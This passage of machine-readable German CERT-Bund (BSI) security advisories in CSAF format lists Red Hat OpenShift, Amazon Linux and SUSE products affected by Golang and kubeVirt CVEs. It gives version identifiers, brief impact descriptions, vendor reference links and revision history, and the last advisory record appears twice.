"4.12.0", product: { name: "Red Hat OpenShift 4.12.0", product_id: "T026026-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:4.12.0", }, }, }, { category: "product_version", name: "Container Platform 4.12", product: { name: "Red Hat OpenShift Container Platform 4.12", product_id: "T026435", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform_4.12", }, }, }, { category: "product_version", name: "Container Platform 4.13", product: { name: "Red Hat OpenShift Container Platform 4.13", product_id: "T027760", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform_4.13", }, }, }, { category: "product_version_range", name: "Container Platform <4.11.43", product: { name: "Red Hat OpenShift Container Platform <4.11.43", product_id: "T028132", }, }, { category: "product_version", name: "Container Platform 4.11.43", product: { name: "Red Hat OpenShift Container Platform 4.11.43", product_id: "T028132-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform__4.11.43", }, }, }, { category: "product_version", name: "Developer Tools and Services 4.11", product: { name: "Red Hat OpenShift Developer Tools and Services 4.11", product_id: "T028205", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:developer_tools_and_services_4.11", }, }, }, { category: "product_version_range", name: "Container Platform <4.11.44", product: { name: "Red Hat OpenShift Container Platform <4.11.44", product_id: "T028416", }, }, { category: "product_version", name: "Container Platform 4.11.44", product: { name: "Red Hat OpenShift Container Platform 4.11.44", product_id: "T028416-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform__4.11.44", }, }, }, { category: "product_version_range", name: "Container Platform <4.15.29", product: { name: "Red Hat OpenShift Container Platform <4.15.29", product_id: "T037140", }, }, { category: "product_version", name: "Container Platform 4.15.29", product: { name: "Red Hat OpenShift Container Platform 4.15.29", product_id: "T037140-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform__4.15.29", }, }, }, ], category: "product_name", name: "OpenShift", }, ], category: "vendor", name: "Red Hat", }, ], }, vulnerabilities: [ { cve: "CVE-2021-38561", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2021-38561", }, { cve: "CVE-2021-44716", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2021-44716", }, { cve: "CVE-2021-44717", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2021-44717", }, { cve: "CVE-2022-1705", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-1705", }, { cve: "CVE-2022-1798", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-1798", }, { cve: "CVE-2022-1962", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-1962", }, { cve: "CVE-2022-23772", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-23772", }, { cve: "CVE-2022-23773", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-23773", }, { cve: "CVE-2022-23806", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-23806", }, { cve: "CVE-2022-28131", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-28131", }, { cve: "CVE-2022-29526", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-29526", }, { cve: "CVE-2022-30629", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-30629", }, { cve: "CVE-2022-30630", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-30630", }, { cve: "CVE-2022-30631", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-30631", }, { cve: "CVE-2022-30632", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-30632", }, { cve: "CVE-2022-30633", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-30633", }, { cve: "CVE-2022-30635", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-30635", }, { cve: "CVE-2022-32148", notes: [ { category: "description", text: "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuführen, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuführen oder Sicherheitsvorkehrungen zu umgehen.", }, ], product_status: { known_affected: [ "T028132", "T037140", "67646", "T025202", "T028416", "T026026", "T026435", "T028205", "T025990", "T027760", ], }, release_date: "2023-01-25T23:00:00.000+00:00", title: "CVE-2022-32148", }, ], }
wid-sec-w-2022-1312
Vulnerability from csaf_certbund
Published
2022-09-06 22:00
Modified
2024-03-07 23:00
Summary
Red Hat OpenShift: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Red Hat OpenShift ist eine "Platform as a Service" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.
Angriff
Ein entfernter, anonymer oder authentisierter Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um Informationen offenzulegen und Sicherheitsmaßnahmen zu umgehen.
Betroffene Betriebssysteme
- UNIX
- Linux
{ document: { aggregate_severity: { text: "hoch", }, category: "csaf_base", csaf_version: "2.0", distribution: { tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "de-DE", notes: [ { category: "legal_disclaimer", text: "Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.", }, { category: "description", text: "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.", title: "Produktbeschreibung", }, { category: "summary", text: "Ein entfernter, anonymer oder authentisierter Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um Informationen offenzulegen und Sicherheitsmaßnahmen zu umgehen.", title: "Angriff", }, { category: "general", text: "- UNIX\n- Linux", title: "Betroffene Betriebssysteme", }, ], publisher: { category: "other", contact_details: "csaf-provider@cert-bund.de", name: "Bundesamt für Sicherheit in der Informationstechnik", namespace: "https://www.bsi.bund.de", }, references: [ { category: "self", summary: "WID-SEC-W-2022-1312 - CSAF Version", url: "https://wid.cert-bund.de/.well-known/csaf/white/2022/wid-sec-w-2022-1312.json", }, { category: "self", summary: "WID-SEC-2022-1312 - Portal Version", url: "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-1312", }, { category: "external", summary: "RHSA-2022:6351 - Security Advisory vom 2022-09-06", url: "https://access.redhat.com/errata/RHSA-2022:6351", }, { category: "external", summary: "SUSE Security Update SUSE-SU-2022:3333-1 vom 2022-09-22", url: "https://lists.suse.com/pipermail/sle-security-updates/2022-September/012328.html", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2022:6681 vom 2022-09-22", url: "https://access.redhat.com/errata/RHSA-2022:6681", }, { category: "external", summary: "SUSE Security Update SUSE-SU-2022:3335-1 vom 2022-09-22", url: "https://lists.suse.com/pipermail/sle-security-updates/2022-September/012327.html", }, { category: "external", summary: "SUSE Security Update SUSE-SU-2022:3334-1 vom 2022-09-22", url: "https://lists.suse.com/pipermail/sle-security-updates/2022-September/012329.html", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2022:6890 vom 2022-10-11", url: "https://access.redhat.com/errata/RHSA-2022:6890", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2DOCKER-2022-020 vom 2022-10-14", url: "https://alas.aws.amazon.com/AL2/ALASDOCKER-2022-020.html", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2-2022-1863 vom 2022-10-21", url: "https://alas.aws.amazon.com/AL2/ALAS-2022-1863.html", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2-2022-1861 vom 2022-10-21", url: "https://alas.aws.amazon.com/AL2/ALAS-2022-1861.html", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2-2022-1858 vom 2022-10-21", url: "https://alas.aws.amazon.com/AL2/ALAS-2022-1858.html", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2-2022-1860 vom 2022-10-21", url: "https://alas.aws.amazon.com/AL2/ALAS-2022-1860.html", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2-2022-1865 vom 2022-10-21", url: "https://alas.aws.amazon.com/AL2/ALAS-2022-1865.html", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2-2022-1864 vom 2022-10-21", url: "https://alas.aws.amazon.com/AL2/ALAS-2022-1864.html", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2-2022-1862 vom 2022-10-21", url: "https://alas.aws.amazon.com/AL2/ALAS-2022-1862.html", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2022:8609 vom 2022-11-23", url: "https://access.redhat.com/errata/RHSA-2022:8609", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0814 vom 2023-02-20", url: "https://access.redhat.com/errata/RHSA-2023:0814", }, { category: "external", summary: "SUSE Security Update SUSE-SU-2023:2002-1 vom 2023-04-25", url: "https://lists.suse.com/pipermail/sle-security-updates/2023-April/014584.html", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:3229 vom 2023-05-19", url: "https://access.redhat.com/errata/RHSA-2023:3229", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:3557 vom 2023-06-10", url: "https://access.redhat.com/errata/RHSA-2023:3557", }, { category: "external", summary: "SUSE Security Update SUSE-SU-2024:0799-1 vom 2024-03-07", url: "https://lists.suse.com/pipermail/sle-security-updates/2024-March/018108.html", }, ], source_lang: "en-US", title: "Red Hat OpenShift: Mehrere Schwachstellen", tracking: { current_release_date: "2024-03-07T23:00:00.000+00:00", generator: { date: "2024-08-15T17:34:39.995+00:00", engine: { name: "BSI-WID", version: "1.3.5", }, }, id: "WID-SEC-W-2022-1312", initial_release_date: "2022-09-06T22:00:00.000+00:00", revision_history: [ { date: "2022-09-06T22:00:00.000+00:00", number: "1", summary: "Initiale Fassung", }, { date: "2022-09-22T22:00:00.000+00:00", number: "2", summary: "Neue Updates von SUSE und Red Hat aufgenommen", }, { date: "2022-10-11T22:00:00.000+00:00", number: "3", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2022-10-13T22:00:00.000+00:00", number: "4", summary: "Neue Updates von Amazon aufgenommen", }, { date: "2022-10-23T22:00:00.000+00:00", number: "5", summary: "Neue Updates von Amazon aufgenommen", }, { date: "2022-11-22T23:00:00.000+00:00", number: "6", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-02-20T23:00:00.000+00:00", number: "7", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-04-25T22:00:00.000+00:00", number: "8", summary: "Neue Updates von SUSE aufgenommen", }, { date: "2023-05-18T22:00:00.000+00:00", number: "9", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-06-11T22:00:00.000+00:00", number: "10", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-03-07T23:00:00.000+00:00", number: "11", summary: "Neue Updates von SUSE aufgenommen", }, ], status: "final", version: "11", }, }, product_tree: { branches: [ { branches: [ { category: "product_name", name: "Amazon Linux 2", product: { name: "Amazon Linux 2", product_id: "398363", product_identification_helper: { cpe: "cpe:/o:amazon:linux_2:-", }, }, }, ], category: "vendor", name: "Amazon", }, { branches: [ { branches: [ { category: "product_name", name: "Red Hat Enterprise Linux", product: { name: "Red Hat Enterprise Linux", product_id: "67646", product_identification_helper: { cpe: "cpe:/o:redhat:enterprise_linux:-", }, }, }, { category: "product_version", name: "Cryostat 2 build", product: { name: "Red Hat Enterprise Linux Cryostat 2 build", product_id: "T026436", product_identification_helper: { cpe: "cpe:/o:redhat:enterprise_linux:cryostat_2_build", }, }, }, ], category: "product_name", name: "Enterprise Linux", }, { branches: [ { category: "product_version_range", name: "Virtualization < 4.10.5", product: { name: "Red Hat OpenShift Virtualization < 4.10.5", product_id: "T024475", }, }, { category: "product_version", name: "GitOps 1.8", product: { name: "Red Hat OpenShift GitOps 1.8", product_id: "T026902", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:gitops_1.8", }, }, }, { category: "product_version", name: "GitOps 1.9", product: { name: "Red Hat OpenShift GitOps 1.9", product_id: "T028023", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:gitops_1.9", }, }, }, ], category: "product_name", name: "OpenShift", }, ], category: "vendor", name: "Red Hat", }, { branches: [ { category: "product_name", name: "SUSE Linux", product: { name: "SUSE Linux", product_id: "T002207", product_identification_helper: { cpe: "cpe:/o:suse:suse_linux:-", }, }, }, ], category: "vendor", name: "SUSE", }, ], }, vulnerabilities: [ { cve: "CVE-2022-1798", notes: [ { category: "description", text: "Es existiert eine Schwachstelle in Red Hat OpenShift. Der Fehler besteht, weil es möglich ist, die kubeVirt-API zu nutzen, um auf Host-Dateien in einer KubeVirt-VM zuzugreifen. Ein entfernter, authentisierter Angreifer kann diese Schwachstelle ausnutzen, um vertrauliche Informationen offenzulegen.", }, ], product_status: { known_affected: [ "T028023", "T002207", "67646", "T026902", "398363", "T026436", ], }, release_date: "2022-09-06T22:00:00.000+00:00", title: "CVE-2022-1798", }, { cve: "CVE-2022-1996", notes: [ { category: "description", text: "Es existiert eine Schwachstelle in Red Hat OpenShift. Der Fehler besteht aufgrund eines benutzergesteuerten Schlüssels im GitHub-Repository emicklei/go-restful. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um die Sicherheitsmaßnahmen zu umgehen.", }, ], product_status: { known_affected: [ "T028023", "T002207", "67646", "T026902", "398363", "T026436", ], }, release_date: "2022-09-06T22:00:00.000+00:00", title: "CVE-2022-1996", }, ], }
WID-SEC-W-2022-1312
Vulnerability from csaf_certbund
Published
2022-09-06 22:00
Modified
2024-03-07 23:00
Summary
Red Hat OpenShift: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Red Hat OpenShift ist eine "Platform as a Service" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.
Angriff
Ein entfernter, anonymer oder authentisierter Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um Informationen offenzulegen und Sicherheitsmaßnahmen zu umgehen.
Betroffene Betriebssysteme
- UNIX
- Linux
{ document: { aggregate_severity: { text: "hoch", }, category: "csaf_base", csaf_version: "2.0", distribution: { tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "de-DE", notes: [ { category: "legal_disclaimer", text: "Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.", }, { category: "description", text: "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.", title: "Produktbeschreibung", }, { category: "summary", text: "Ein entfernter, anonymer oder authentisierter Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um Informationen offenzulegen und Sicherheitsmaßnahmen zu umgehen.", title: "Angriff", }, { category: "general", text: "- UNIX\n- Linux", title: "Betroffene Betriebssysteme", }, ], publisher: { category: "other", contact_details: "csaf-provider@cert-bund.de", name: "Bundesamt für Sicherheit in der Informationstechnik", namespace: "https://www.bsi.bund.de", }, references: [ { category: "self", summary: "WID-SEC-W-2022-1312 - CSAF Version", url: "https://wid.cert-bund.de/.well-known/csaf/white/2022/wid-sec-w-2022-1312.json", }, { category: "self", summary: "WID-SEC-2022-1312 - Portal Version", url: "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-1312", }, { category: "external", summary: "RHSA-2022:6351 - Security Advisory vom 2022-09-06", url: "https://access.redhat.com/errata/RHSA-2022:6351", }, { category: "external", summary: "SUSE Security Update SUSE-SU-2022:3333-1 vom 2022-09-22", url: "https://lists.suse.com/pipermail/sle-security-updates/2022-September/012328.html", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2022:6681 vom 2022-09-22", url: "https://access.redhat.com/errata/RHSA-2022:6681", }, { category: "external", summary: "SUSE Security Update SUSE-SU-2022:3335-1 vom 2022-09-22", url: "https://lists.suse.com/pipermail/sle-security-updates/2022-September/012327.html", }, { category: "external", summary: "SUSE Security Update SUSE-SU-2022:3334-1 vom 2022-09-22", url: "https://lists.suse.com/pipermail/sle-security-updates/2022-September/012329.html", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2022:6890 vom 2022-10-11", url: "https://access.redhat.com/errata/RHSA-2022:6890", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2DOCKER-2022-020 vom 2022-10-14", url: "https://alas.aws.amazon.com/AL2/ALASDOCKER-2022-020.html", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2-2022-1863 vom 2022-10-21", url: "https://alas.aws.amazon.com/AL2/ALAS-2022-1863.html", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2-2022-1861 vom 2022-10-21", url: "https://alas.aws.amazon.com/AL2/ALAS-2022-1861.html", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2-2022-1858 vom 2022-10-21", url: "https://alas.aws.amazon.com/AL2/ALAS-2022-1858.html", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2-2022-1860 vom 2022-10-21", url: "https://alas.aws.amazon.com/AL2/ALAS-2022-1860.html", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2-2022-1865 vom 2022-10-21", url: "https://alas.aws.amazon.com/AL2/ALAS-2022-1865.html", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2-2022-1864 vom 2022-10-21", url: "https://alas.aws.amazon.com/AL2/ALAS-2022-1864.html", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS2-2022-1862 vom 2022-10-21", url: "https://alas.aws.amazon.com/AL2/ALAS-2022-1862.html", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2022:8609 vom 2022-11-23", url: "https://access.redhat.com/errata/RHSA-2022:8609", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:0814 vom 2023-02-20", url: "https://access.redhat.com/errata/RHSA-2023:0814", }, { category: "external", summary: "SUSE Security Update SUSE-SU-2023:2002-1 vom 2023-04-25", url: "https://lists.suse.com/pipermail/sle-security-updates/2023-April/014584.html", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:3229 vom 2023-05-19", url: "https://access.redhat.com/errata/RHSA-2023:3229", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2023:3557 vom 2023-06-10", url: "https://access.redhat.com/errata/RHSA-2023:3557", }, { category: "external", summary: "SUSE Security Update SUSE-SU-2024:0799-1 vom 2024-03-07", url: "https://lists.suse.com/pipermail/sle-security-updates/2024-March/018108.html", }, ], source_lang: "en-US", title: "Red Hat OpenShift: Mehrere Schwachstellen", tracking: { current_release_date: "2024-03-07T23:00:00.000+00:00", generator: { date: "2024-08-15T17:34:39.995+00:00", engine: { name: "BSI-WID", version: "1.3.5", }, }, id: "WID-SEC-W-2022-1312", initial_release_date: "2022-09-06T22:00:00.000+00:00", revision_history: [ { date: "2022-09-06T22:00:00.000+00:00", number: "1", summary: "Initiale Fassung", }, { date: "2022-09-22T22:00:00.000+00:00", number: "2", summary: "Neue Updates von SUSE und Red Hat aufgenommen", }, { date: "2022-10-11T22:00:00.000+00:00", number: "3", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2022-10-13T22:00:00.000+00:00", number: "4", summary: "Neue Updates von Amazon aufgenommen", }, { date: "2022-10-23T22:00:00.000+00:00", number: "5", summary: "Neue Updates von Amazon aufgenommen", }, { date: "2022-11-22T23:00:00.000+00:00", number: "6", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-02-20T23:00:00.000+00:00", number: "7", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-04-25T22:00:00.000+00:00", number: "8", summary: "Neue Updates von SUSE aufgenommen", }, { date: "2023-05-18T22:00:00.000+00:00", number: "9", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2023-06-11T22:00:00.000+00:00", number: "10", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-03-07T23:00:00.000+00:00", number: "11", summary: "Neue Updates von SUSE aufgenommen", }, ], status: "final", version: "11", }, }, product_tree: { branches: [ { branches: [ { category: "product_name", name: "Amazon Linux 2", product: { name: "Amazon Linux 2", product_id: "398363", product_identification_helper: { cpe: "cpe:/o:amazon:linux_2:-", }, }, }, ], category: "vendor", name: "Amazon", }, { branches: [ { branches: [ { category: "product_name", name: "Red Hat Enterprise Linux", product: { name: "Red Hat Enterprise Linux", product_id: "67646", product_identification_helper: { cpe: "cpe:/o:redhat:enterprise_linux:-", }, }, }, { category: "product_version", name: "Cryostat 2 build", product: { name: "Red Hat Enterprise Linux Cryostat 2 build", product_id: "T026436", product_identification_helper: { cpe: "cpe:/o:redhat:enterprise_linux:cryostat_2_build", }, }, }, ], category: 